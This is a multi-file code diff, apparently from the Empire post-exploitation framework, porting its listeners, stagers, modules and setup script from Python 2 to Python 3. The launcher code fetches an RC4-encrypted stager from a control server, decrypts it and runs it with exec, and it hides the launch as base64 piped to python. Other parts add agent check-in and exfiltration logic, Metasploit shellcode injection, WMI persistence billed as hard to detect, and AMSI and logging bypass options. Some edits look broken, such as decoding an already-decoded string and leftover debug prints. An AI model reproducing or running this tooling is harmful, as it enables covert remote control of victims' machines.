474 | launcherBase += "o = urllib.build_opener(proxy);\n" | |
475 | ||
476 | # add the RC4 packet to a cookie | |
477 | launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % ( | |
478 | b64RoutingPacket) | |
474 | 479 | else: |
475 | 480 | launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n" |
476 | 481 | username = proxyCreds.split(':')[0] |
477 | 482 | password = proxyCreds.split(':')[1] |
478 | 483 | launcherBase += "proxy_auth_handler.add_password(None,'" + proxy + "','" + username + "','" + password + "');\n" |
479 | launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n" | |
484 | launcherBase += "o = urllib.build_opener(proxy, proxy_auth_handler);\n" | |
485 | ||
486 | # add the RC4 packet to a cookie | |
487 | launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % ( | |
488 | b64RoutingPacket) | |
480 | 489 | else: |
481 | launcherBase += "o = urllib2.build_opener(proxy);\n" | |
490 | launcherBase += "o = urllib.build_opener(proxy);\n" | |
482 | 491 | else: |
483 | launcherBase += "o = urllib2.build_opener();\n" | |
492 | launcherBase += "o = urllib.build_opener();\n" | |
484 | 493 | |
485 | 494 | # install proxy and creds globally, so they can be used with urlopen. |
486 | launcherBase += "urllib2.install_opener(o);\n" | |
495 | launcherBase += "urllib.install_opener(o);\n" | |
487 | 496 | |
488 | 497 | # download the stager and extract the IV |
489 | 498 | |
490 | launcherBase += "a=urllib2.urlopen(req).read();\n" | |
499 | launcherBase += "a=urllib.urlopen(req).read();\n" | |
491 | 500 | launcherBase += "IV=a[0:4];" |
492 | 501 | launcherBase += "data=a[4:];" |
493 | launcherBase += "key=IV+'%s';" % (stagingKey) | |
502 | launcherBase += "key=IV+'%s'.encode('UTF-8');" % (stagingKey) | |
494 | 503 | |
495 | 504 | # RC4 decryption |
496 | launcherBase += "S,j,out=range(256),0,[]\n" | |
497 | launcherBase += "for i in range(256):\n" | |
498 | launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n" | |
505 | launcherBase += "S,j,out=list(range(256)),0,[]\n" | |
506 | launcherBase += "for i in list(range(256)):\n" | |
507 | launcherBase += " j=(j+S[i]+key[i%len(key)])%256\n" | |
499 | 508 | launcherBase += " S[i],S[j]=S[j],S[i]\n" |
500 | 509 | launcherBase += "i=j=0\n" |
501 | 510 | launcherBase += "for char in data:\n" |
502 | 511 | launcherBase += " i=(i+1)%256\n" |
503 | 512 | launcherBase += " j=(j+S[i])%256\n" |
504 | 513 | launcherBase += " S[i],S[j]=S[j],S[i]\n" |
505 | launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n" | |
514 | launcherBase += " out.append(chr(char^S[(S[i]+S[j])%256]))\n" | |
506 | 515 | launcherBase += "exec(''.join(out))" |
507 | 516 | |
508 | 517 | if encode: |
509 | launchEncoded = base64.b64encode(launcherBase) | |
518 | launchEncoded = base64.b64encode(launcherBase.encode('UTF-8')).decode('UTF-8') | |
510 | 519 | launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % ( |
511 | launchEncoded) | |
520 | launchEncoded.decode('UTF-8')) | |
512 | 521 | return launcher |
513 | 522 | else: |
514 | 523 | return launcherBase |
626 | 635 | 'stage_1': stage1, |
627 | 636 | 'stage_2': stage2 |
628 | 637 | } |
629 | ||
638 | ||
630 | 639 | stager = template.render(template_options) |
631 | 640 | stager = obfuscation.py_minify(stager) |
632 | ||
641 | ||
633 | 642 | # base64 encode the stager and return it |
634 | 643 | if encode: |
635 | 644 | return base64.b64encode(stager) |
636 | 645 | if encrypt: |
637 | 646 | # return an encrypted version of the stager ("normal" staging) |
638 | 647 | RC4IV = os.urandom(4) |
639 | return RC4IV + encryption.rc4(RC4IV + stagingKey, stager) | |
648 | ||
649 | return RC4IV + encryption.rc4(RC4IV + stagingKey.encode('UTF-8'), stager.encode('UTF-8')) | |
640 | 650 | else: |
641 | 651 | # otherwise return the standard stager |
642 | 652 | return stager |
831 | 841 | return updateServers + getTask + sendMessage |
832 | 842 | |
833 | 843 | elif language.lower() == 'python': |
834 | ||
835 | 844 | updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value']) |
836 | 845 | |
837 | 846 | if listenerOptions['Host']['Value'].startswith('https'): |
838 | 847 | updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None" |
839 | print('listeners/http.py: line 851') | |
840 | 848 | sendMessage = """ |
841 | 849 | def send_message(packets=None): |
842 | 850 | # Requests a tasking or posts data to a randomized tasking URI. |
843 | 851 | # If packets == None, the agent GETs a tasking from the control server. |
844 | 852 | # If packets != None, the agent encrypts the passed packets and |
845 | 853 | # POSTs the data to the control server. |
846 | ||
847 | 854 | global missedCheckins |
848 | 855 | global server |
849 | 856 | global headers |
850 | 857 | global taskURIs |
851 | ||
852 | 858 | data = None |
853 | 859 | if packets: |
854 | data = ''.join(packets) | |
860 | data = ''.join(packets.decode('latin-1')) | |
855 | 861 | # aes_encrypt_then_hmac is in stager.py |
856 | 862 | encData = aes_encrypt_then_hmac(key, data) |
857 | 863 | data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData) |
864 | ||
858 | 865 | else: |
859 | 866 | # if we're GETing taskings, then build the routing packet to stuff info a cookie first. |
860 | 867 | # meta TASKING_REQUEST = 4 |
868 | print('getting tasking') | |
861 | 869 | routingPacket = build_routing_packet(stagingKey, sessionID, meta=4) |
862 | b64routingPacket = base64.b64encode(routingPacket) | |
863 | headers['Cookie'] = \"""" + self.session_cookie + """=%s" % (b64routingPacket) | |
864 | ||
870 | b64routingPacket = base64.b64encode(routingPacket).decode('UTF-8') | |
871 | headers['Cookie'] = \"""" + self.session_cookie + """session=%s" % (b64routingPacket) | |
865 | 872 | taskURI = random.sample(taskURIs, 1)[0] |
866 | 873 | requestUri = server + taskURI |
867 | ||
874 | ||
868 | 875 | try: |
869 | data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read() | |
876 | data = (urllib.urlopen(urllib.Request(requestUri, data, headers))).read() | |
870 | 877 | return ('200', data) |
871 | 878 | |
872 | except urllib2.HTTPError as HTTPError: | |
873 | # if the server is reached, but returns an erro (like 404) | |
879 | except urllib.HTTPError as HTTPError: | |
880 | # if the server is reached, but returns an error (like 404) | |
874 | 881 | missedCheckins = missedCheckins + 1 |
875 | 882 | #if signaled for restaging, exit. |
876 | 883 | if HTTPError.code == 401: |
878 | 885 | |
879 | 886 | return (HTTPError.code, '') |
880 | 887 | |
881 | except urllib2.URLError as URLerror: | |
888 | except urllib.URLError as URLerror: | |
882 | 889 | # if the server cannot be reached |
883 | 890 | missedCheckins = missedCheckins + 1 |
884 | 891 | return (URLerror.reason, '') |
885 | ||
886 | 892 | return ('', '') |
887 | 893 | """ |
888 | 894 | return updateServers + sendMessage |
1041 | 1047 | # handle_agent_data() signals that the listener should return the stager.ps1 code |
1042 | 1048 | # step 2 of negotiation -> return stager.ps1 (stage 1) |
1043 | 1049 | listenerName = self.options['Name']['Value'] |
1044 | message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP) | |
1050 | message = "\n[*] Sending {} stager (stage 1) to {}".format(language, clientIP) | |
1045 | 1051 | signal = json.dumps({ |
1046 | 1052 | 'print': True, |
1047 | 1053 | 'message': message |
1120 | 1126 | for (language, results) in dataResults: |
1121 | 1127 | if isinstance(results, str): |
1122 | 1128 | results = results.encode('UTF-8') |
1129 | ||
1123 | 1130 | if results: |
1124 | 1131 | if results.startswith(b'STAGE2'): |
1125 | 1132 | # TODO: document the exact results structure returned |
715 | 715 | |
716 | 716 | # step 2 of negotiation -> return stager.ps1 (stage 1) |
717 | 717 | listenerName = self.options['Name']['Value'] |
718 | message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP) | |
718 | message = "\n[*] Sending {} stager (stage 1) to {}".format(language, clientIP) | |
719 | 719 | signal = json.dumps({ |
720 | 720 | 'print': True, |
721 | 721 | 'message': message |
547 | 547 | # handle_agent_data() signals that the listener should return the stager.ps1 code |
548 | 548 | |
549 | 549 | # step 2 of negotiation -> return stager.ps1 (stage 1) |
550 | dispatcher.send("[*] Sending %s stager (stage 1) to %s" % (language, clientIP), sender='listeners/http') | |
550 | dispatcher.send("\n[*] Sending %s stager (stage 1) to %s" % (language, clientIP), sender='listeners/http') | |
551 | 551 | stage = self.generate_stager(language=language, listenerOptions=listenerOptions) |
552 | 552 | return make_response(stage, 200) |
553 | 553 |
2 | 2 | from builtins import str |
3 | 3 | from builtins import object |
4 | 4 | from lib.common import helpers |
5 | ||
6 | 5 | |
7 | 6 | class Listener(object): |
8 | 7 | |
66 | 65 | |
67 | 66 | return True |
68 | 67 | |
69 | ||
70 | def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None): | |
68 | def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None, scriptLogBypass=None, AMSIBypass=None, AMSIBypass2=None): | |
71 | 69 | """ |
72 | 70 | Generate a basic launcher for the specified listener. |
73 | 71 | """ |
57 | 57 | 'Required' : False, |
58 | 58 | 'Value' : '' |
59 | 59 | }, |
60 | 'Payload' : { | |
61 | 'Description' : 'Metasploit payload to inject (reverse_http[s]).', | |
62 | 'Required' : False, | |
63 | 'Value' : 'reverse_https' | |
64 | }, | |
60 | ||
65 | 61 | 'Lhost' : { |
66 | 62 | 'Description' : 'Local host handler for the meterpreter shell.', |
67 | 63 | 'Required' : False, |
74 | 70 | }, |
75 | 71 | 'Shellcode' : { |
76 | 72 | 'Description' : 'Custom shellcode to inject, 0xaa,0xab,... format.', |
77 | 'Required' : False, | |
73 | 'Required' : True, | |
78 | 74 | 'Value' : '' |
79 | 75 | } |
80 | 76 | } |
135 | 131 | for option,values in self.options.items(): |
136 | 132 | if option.lower() != "agent" and option.lower() != "listener": |
137 | 133 | if values['Value'] and values['Value'] != '': |
138 | if option.lower() == "payload": | |
134 | if option.lower() == "payload" : | |
139 | 135 | payload = "windows/meterpreter/" + str(values['Value']) |
140 | 136 | scriptEnd += " -" + str(option) + " " + payload |
141 | 137 | elif option.lower() == "shellcode": |
142 | 138 | # transform the shellcode to the correct format |
143 | sc = ",0".join(values['Value'].split("\\"))[1:] | |
139 | sc = ",0".join(values['Value'].split("\\"))[0:] | |
144 | 140 | scriptEnd += " -" + str(option) + " @(" + sc + ")" |
145 | 141 | else: |
146 | 142 | scriptEnd += " -" + str(option) + " " + str(values['Value']) |
9 | 9 | self.info = { |
10 | 10 | 'Name': 'Invoke-WMI', |
11 | 11 | |
12 | 'Author': ['@mattifestation', '@harmj0y'], | |
12 | 'Author': ['@mattifestation', '@harmj0y', '@jbooz1'], | |
13 | 13 | |
14 | 14 | 'Description': ( |
15 | 15 | 'Persist a stager (or script) using a permanent WMI subscription. This has a difficult detection/removal rating.'), |
224 | 224 | script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, |
225 | 225 | obfuscationCommand=obfuscationCommand) |
226 | 226 | |
227 | return script⏎ | |
227 | return script |
161 | 161 | poshchunks = list(helpers.chunks(poshlauncher, 50)) |
162 | 162 | poshpayload = "Dim Str As String" |
163 | 163 | poshpayload += "\n\t\tstr = \"" + str(poshchunks[0]) |
164 | ||
164 | 165 | for poshchunk in poshchunks[1:]: |
165 | 166 | poshpayload += "\n\t\tstr = str + \"" + str(poshchunk) |
166 | 167 |
156 | 156 | |
157 | 157 | # generate the launcher code |
158 | 158 | launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=encode, obfuscate=invokeObfuscation, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries, safeChecks=safeChecks, scriptLogBypass=scriptLogBypassBool, AMSIBypass=AMSIBypassBool, AMSIBypass2=AMSIBypass2Bool) |
159 | Str = ''.join(random.choice(string.letters) for i in range(random.randint(1,len(listenerName)))) | |
160 | Method=''.join(random.choice(string.letters) for i in range(random.randint(1,len(listenerName)))) | |
159 | Str = ''.join(random.choice(string.ascii_letters) for i in range(random.randint(1,len(listenerName)))) | |
160 | Method=''.join(random.choice(string.ascii_letters) for i in range(random.randint(1,len(listenerName)))) | |
161 | 161 | |
162 | 162 | if launcher == "": |
163 | 163 | print(helpers.color("[!] Error in launcher command generation.")) |
0 | 0 | #!/bin/bash |
1 | function install_powershell() { | |
2 | # Deb 10.x | |
3 | if cat /etc/debian_version | grep 10.* ; then | |
4 | sudo apt-get install -y apt-transport-https curl | |
5 | curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - | |
6 | sudo sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main" > /etc/apt/sources.list.d/microsoft.list' | |
1 | 7 | |
8 | mkdir /tmp/pwshtmp | |
9 | (cd /tmp/pwshtmp && \ | |
10 | wget http://http.us.debian.org/debian/pool/main/i/icu/libicu57_57.1-6+deb9u3_amd64.deb && \ | |
11 | wget http://http.us.debian.org/debian/pool/main/u/ust/liblttng-ust0_2.9.0-2+deb9u1_amd64.deb && \ | |
12 | wget http://http.us.debian.org/debian/pool/main/libu/liburcu/liburcu4_0.9.3-1_amd64.deb && \ | |
13 | wget http://http.us.debian.org/debian/pool/main/u/ust/liblttng-ust-ctl2_2.9.0-2+deb9u1_amd64.deb && \ | |
14 | wget http://security.debian.org/debian-security/pool/updates/main/o/openssl1.0/libssl1.0.2_1.0.2t-1~deb9u1_amd64.deb && \ | |
15 | sudo dpkg -i *.deb) | |
16 | rm -rf /tmp/pwshtmp | |
2 | 17 | |
3 | # functions | |
18 | sudo apt-get update | |
19 | sudo apt-get install -y powershell | |
20 | # Deb 9.x | |
21 | elif cat /etc/debian_version | grep 9.* ; then | |
22 | # Install system components | |
23 | sudo apt-get install -y apt-transport-https curl | |
24 | # Import the public repository GPG keys | |
25 | curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - | |
26 | # Register the Microsoft Product feed | |
27 | sudo sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main" > /etc/apt/sources.list.d/microsoft.list' | |
28 | # Update the list of products | |
29 | sudo apt-get update | |
30 | # Install PowerShell | |
31 | sudo apt-get install -y powershell | |
32 | # Deb 8.x | |
33 | elif cat /etc/debian_version | grep 8.* ; then | |
34 | # Install system components | |
35 | sudo apt-get install -y apt-transport-https curl gnupg | |
36 | # Import the public repository GPG keys | |
37 | curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - | |
38 | # Register the Microsoft Product feed | |
39 | sudo sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-jessie-prod jessie main" > /etc/apt/sources.list.d/microsoft.list' | |
40 | # Update the list of products | |
41 | sudo apt-get update | |
42 | # Install PowerShell | |
43 | sudo apt-get install -y powershell | |
44 | #Ubuntu | |
45 | elif lsb_release -d | grep -q "Ubuntu"; then | |
46 | # Read Ubuntu version | |
47 | local ubuntu_version=$( grep 'DISTRIB_RELEASE=' /etc/lsb-release | grep -o -E [[:digit:]]+\\.[[:digit:]]+ ) | |
48 | # Install system components | |
49 | sudo apt-get install -y apt-transport-https curl | |
50 | # Import the public repository GPG keys | |
51 | curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - | |
52 | # Register the Microsoft Ubuntu repository | |
53 | curl https://packages.microsoft.com/config/ubuntu/$ubuntu_version/prod.list | sudo tee /etc/apt/sources.list.d/microsoft.list | |
54 | # Update the list of products | |
55 | sudo apt-get update | |
56 | # Install PowerShell | |
57 | sudo apt-get install -y powershell | |
58 | #Kali Linux | |
59 | elif lsb_release -d | grep -q "Kali"; then | |
60 | # Download & Install prerequisites | |
61 | wget http://ftp.us.debian.org/debian/pool/main/i/icu/libicu57_57.1-6+deb9u2_amd64.deb | |
62 | dpkg -i libicu57_57.1-6+deb9u2_amd64.deb | |
63 | apt-get update && apt-get install -y curl gnupg apt-transport-https | |
4 | 64 | |
5 | # Install Powershell on Linux | |
6 | function install_powershell() { | |
7 | if uname | grep -q "Darwin"; then | |
8 | brew install openssl | |
9 | brew install curl --with-openssl | |
10 | brew tap caskroom/cask | |
11 | brew cask install powershell | |
12 | else | |
13 | # Deb 9.x | |
14 | if cat /etc/debian_version | grep 9.* ; then | |
15 | # Install system components | |
16 | sudo apt-get install -y apt-transport-https curl | |
17 | # Import the public repository GPG keys | |
18 | curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - | |
19 | # Register the Microsoft Product feed | |
20 | sudo sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main" > /etc/apt/sources.list.d/microsoft.list' | |
21 | # Update the list of products | |
22 | sudo apt-get update | |
23 | # Install PowerShell | |
24 | sudo apt-get install -y powershell | |
25 | # Deb 8.x | |
26 | elif cat /etc/debian_version | grep 8.* ; then | |
27 | # Install system components | |
28 | sudo apt-get install -y apt-transport-https curl gnupg | |
29 | # Import the public repository GPG keys | |
30 | curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - | |
31 | # Register the Microsoft Product feed | |
32 | sudo sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-jessie-prod jessie main" > /etc/apt/sources.list.d/microsoft.list' | |
33 | # Update the list of products | |
34 | sudo apt-get update | |
35 | # Install PowerShell | |
36 | sudo apt-get install -y powershell | |
37 | #Ubuntu | |
38 | elif lsb_release -d | grep -q "Ubuntu"; then | |
39 | # Read Ubuntu version | |
40 | local ubuntu_version=$( grep 'DISTRIB_RELEASE=' /etc/lsb-release | grep -o -E [[:digit:]]+\\.[[:digit:]]+ ) | |
41 | # Install system components | |
42 | sudo apt-get install -y apt-transport-https curl | |
43 | # Import the public repository GPG keys | |
44 | curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - | |
45 | # Register the Microsoft Ubuntu repository | |
46 | curl https://packages.microsoft.com/config/ubuntu/$ubuntu_version/prod.list | sudo tee /etc/apt/sources.list.d/microsoft.list | |
47 | # Update the list of products | |
48 | sudo apt-get update | |
49 | # Install PowerShell | |
50 | sudo apt-get install -y powershell | |
51 | #Kali Linux | |
52 | elif cat /etc/lsb-release | grep -i 'Kali'; then | |
53 | # Install prerequisites | |
54 | apt-get install -y curl gnupg apt-transport-https | |
55 | # Import the public repository GPG keys | |
56 | curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - | |
57 | # Register the Microsoft Product feed | |
58 | sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main" > /etc/apt/sources.list.d/microsoft.list' | |
59 | # Update the list of products | |
60 | apt-get update | |
61 | wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu57_57.1-6_amd64.deb | |
62 | dpkg -i libicu57_57.1-6_amd64.deb | |
63 | # Install PowerShell | |
64 | apt-get install -y powershell | |
65 | fi | |
66 | fi | |
67 | if ls /opt/microsoft/powershell/*/DELETE_ME_TO_DISABLE_CONSOLEHOST_TELEMETRY; then | |
68 | rm /opt/microsoft/powershell/*/DELETE_ME_TO_DISABLE_CONSOLEHOST_TELEMETRY | |
69 | fi | |
65 | # Add Microsoft public repository key to APT | |
66 | curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add - | |
67 | ||
68 | # Add Microsoft package repository to the source list | |
69 | echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main" | tee /etc/apt/sources.list.d/powershell.list | |
70 | ||
71 | # Install PowerShell package | |
72 | apt-get update && apt-get install -y powershell | |
73 | fi | |
74 | if ls /opt/microsoft/powershell/*/DELETE_ME_TO_DISABLE_CONSOLEHOST_TELEMETRY; then | |
75 | rm /opt/microsoft/powershell/*/DELETE_ME_TO_DISABLE_CONSOLEHOST_TELEMETRY | |
76 | fi | |
70 | 77 | mkdir -p /usr/local/share/powershell/Modules |
71 | 78 | cp -r ../lib/powershell/Invoke-Obfuscation /usr/local/share/powershell/Modules |
72 | 79 | } |
73 | 80 | |
81 | function install_xar() { | |
82 | # xar-1.6.1 has an incompatability with libssl 1.1.x that is patched here | |
83 | # for older OS on libssl 1.0.x, we continue to use 1.6.1 | |
84 | if is_libssl_1_0; then | |
85 | wget https://github.com/BC-SECURITY/xar/archive/xar-1.6.1.tar.gz | |
86 | tar -xvf xar-1.6.1.tar.gz && mv xar-xar-1.6.1/xar/ xar-1.6.1/ | |
87 | else | |
88 | wget https://github.com/BC-SECURITY/xar/archive/xar-1.6.1-patch.tar.gz | |
89 | tar -xvf xar-1.6.1-patch.tar.gz && mv xar-xar-1.6.1-patch/xar/ xar-1.6.1/ | |
90 | fi | |
91 | (cd xar-1.6.1 && ./autogen.sh) | |
92 | (cd xar-1.6.1 && ./configure) | |
93 | (cd xar-1.6.1 && make) | |
94 | (cd xar-1.6.1 && sudo make install) | |
95 | } | |
96 | ||
97 | function install_bomutils() { | |
98 | git clone https://github.com/hogliux/bomutils.git | |
99 | (cd bomutils && make) | |
100 | (cd bomutils && make install) | |
101 | chmod 755 bomutils/build/bin/mkbom && sudo cp bomutils/build/bin/mkbom /usr/local/bin/. | |
102 | } | |
103 | ||
104 | # Because of some dependencies (xar) needing to know which OS has libssl 1.0 | |
105 | # and because some OS are locked into 1.0, we are checking for Ubuntu < 18 and Debian < 9 here. | |
106 | function is_libssl_1_0() { | |
107 | if lsb_release -d | grep -q "Ubuntu"; then | |
108 | if [ $(lsb_release -rs | cut -d "." -f 1) -lt 18 ]; then | |
109 | return | |
110 | fi | |
111 | fi | |
112 | ||
113 | if [ $(cut -d "." -f 1 /etc/debian_version) -lt 9 ]; then | |
114 | return | |
115 | fi | |
116 | ||
117 | false | |
118 | } | |
74 | 119 | |
75 | 120 | # Ask for the administrator password upfront so sudo is no longer required at Installation. |
76 | 121 | sudo -v |
79 | 124 | |
80 | 125 | if [[ "$(pwd)" != *setup ]] |
81 | 126 | then |
82 | cd ./setup | |
127 | cd ./setup | |
83 | 128 | fi |
84 | 129 | |
85 | if uname | grep -q "Darwin"; then | |
86 | Xar_version="xar-1.5.2" | |
87 | install_powershell | |
88 | sudo pip install -r requirements.txt --global-option=build_ext \ | |
89 | --global-option="-L/usr/local/opt/openssl/lib" \ | |
90 | --global-option="-I/usr/local/opt/openssl/include" | |
91 | # In order to build dependencies these should be exproted. | |
92 | export LDFLAGS=-L/usr/local/opt/openssl/lib | |
93 | export CPPFLAGS=-I/usr/local/opt/openssl/include | |
130 | Pip_file="requirements.txt" | |
131 | ||
132 | if lsb_release -d | grep -q "Kali"; then | |
133 | apt-get update | |
134 | sudo apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk zlib1g-dev libssl1.1 build-essential libssl-dev libxml2-dev zlib1g-dev | |
135 | elif lsb_release -d | grep -q "Ubuntu"; then | |
136 | if is_libssl_1_0; then | |
137 | LibSSL_pkgs="libssl1.0.0 libssl-dev" | |
138 | Pip_file="requirements_libssl1.0.txt" | |
139 | else | |
140 | LibSSL_pkgs="libssl1.1 libssl-dev" | |
141 | fi | |
142 | sudo apt-get update | |
143 | sudo apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk $LibSSL_pkgs build-essential | |
94 | 144 | else |
95 | ||
96 | version=$( lsb_release -r | grep -oP "[0-9]+" | head -1 ) | |
97 | if lsb_release -d | grep -q "Fedora"; then | |
98 | Release=Fedora | |
99 | Xar_version="xar-1.5.2" | |
100 | sudo dnf install -y make automake gcc gcc-c++ python-devel m2crypto python-m2ext swig libxml2-devel java-openjdk-headless openssl-devel openssl libffi-devel redhat-rpm-config | |
101 | sudo pip install -r requirements.txt | |
102 | elif lsb_release -d | grep -q "Kali"; then | |
103 | Release=Kali | |
104 | Xar_version="xar-1.6.1" | |
105 | apt-get update | |
106 | sudo apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk zlib1g-dev libssl1.1 build-essential libssl-dev libxml2-dev zlib1g-dev | |
107 | sudo pip install -r requirements.txt | |
108 | install_powershell | |
109 | elif lsb_release -d | grep -q "Ubuntu"; then | |
110 | Release=Ubuntu | |
111 | sudo apt-get update | |
112 | if [ $(lsb_release -rs | cut -d "." -f 1) -ge 18 ]; then | |
113 | LibSSL_pkgs="libssl1.1 libssl-dev" | |
114 | Pip_file="requirements.txt" | |
115 | Xar_version="xar-1.6.1" | |
116 | else | |
117 | LibSSL_pkgs="libssl1.0.0 libssl-dev" | |
118 | Pip_file="requirements_libssl1.0.txt" | |
119 | Xar_version="xar-1.5.2" | |
120 | fi | |
121 | sudo apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk $LibSSL_pkgs build-essential | |
122 | sudo pip install -r $Pip_file | |
123 | install_powershell | |
145 | echo "Unknown distro - Debian/Ubuntu Fallback" | |
146 | if is_libssl_1_0; then | |
147 | LibSSL_pkgs="libssl1.0.0 libssl-dev" | |
148 | Pip_file="requirements_libssl1.0.txt" | |
124 | 149 | else |
125 | echo "Unknown distro - Debian/Ubuntu Fallback" | |
126 | sudo apt-get update | |
127 | if [ $(cut -d "." -f 1 /etc/debian_version) -ge 9 ]; then | |
128 | LibSSL_pkgs="libssl1.1 libssl-dev" | |
129 | Pip_file="requirements.txt" | |
130 | Xar_version="xar-1.6.1" | |
131 | else | |
132 | LibSSL_pkgs="libssl1.0.0 libssl-dev" | |
133 | Pip_file="requirements_libssl1.0.txt" | |
134 | Xar_version="xar-1.5.2" | |
135 | fi | |
136 | sudo apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libffi-dev $LibSSL_pkgs build-essential | |
137 | sudo pip install -r $Pip_file | |
138 | install_powershell | |
150 | LibSSL_pkgs="libssl1.1 libssl-dev" | |
139 | 151 | fi |
152 | sudo apt-get update | |
153 | sudo apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libffi-dev $LibSSL_pkgs build-essential | |
140 | 154 | fi |
141 | 155 | |
142 | # Installing xar | |
143 | tar -xvf ../data/misc/$Xar_version.tar.gz | |
144 | (cd $Xar_version && ./configure) | |
145 | (cd $Xar_version && make) | |
146 | (cd $Xar_version && sudo make install) | |
156 | install_xar | |
147 | 157 | |
148 | #Installing bomutils | |
149 | git clone https://github.com/hogliux/bomutils.git | |
150 | (cd bomutils && make) | |
151 | (cd bomutils && make install) | |
158 | install_bomutils | |
152 | 159 | |
153 | # NIT: This fails on OSX. Leaving it only on Linux instances. | |
154 | if uname | grep -q "Linux"; then | |
155 | (cd bomutils && make install) | |
160 | install_powershell | |
161 | ||
162 | if ls /usr/bin/ | grep -q "python3"; then | |
163 | if ! type pip3 > /dev/null; then | |
164 | sudo apt-get --assume-yes install python3-pip | |
165 | fi | |
166 | sudo pip3 install -r $Pip_file | |
156 | 167 | fi |
157 | chmod 755 bomutils/build/bin/mkbom && sudo cp bomutils/build/bin/mkbom /usr/local/bin/. | |
168 | if ls /usr/bin/ | grep -q "python2"; then | |
169 | sudo pip install -r $Pip_file | |
170 | fi | |
158 | 171 | |
159 | 172 | # set up the database schema |
160 | 173 | python ./setup_database.py |